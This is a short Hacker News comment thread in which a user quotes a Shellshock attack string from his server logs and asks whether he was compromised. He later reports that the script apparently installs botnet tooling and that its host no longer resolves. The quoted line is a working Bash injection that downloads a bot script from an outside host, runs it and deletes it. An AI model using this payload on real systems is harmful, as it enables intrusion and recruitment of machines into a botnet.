"() { :;}; /bin/bash -c \"wget http://stablehost.us/bots/regular.bot -O /tmp/sh;... | Hacker News

Hacker Newsnew | past | comments | ask | show | jobs | submit

		ralphc on Oct 2, 2014 \| parent \| context \| favorite \| on: Inside Shellshock: How hackers are using it to exp... "() { :;}; /bin/bash -c \"wget http://stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh\"" I have several lines like this in my logs. So I guess that someone tried (or succeeded) to download a script to my machine, run it & delete it? I think this could have happened before I patched & rebooted. How worried should I be?

ralphc on Oct 2, 2014 | [–]

Did some searching, looks like it tries to set up a botnet. One of the things this does is install nmap; the machine doesn't have nmap on it, makes me feel better.

ralphc on Oct 2, 2014 | [–]

Oh, I tried a maunal curl, "Could not resolve host: stablehost.us"

Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact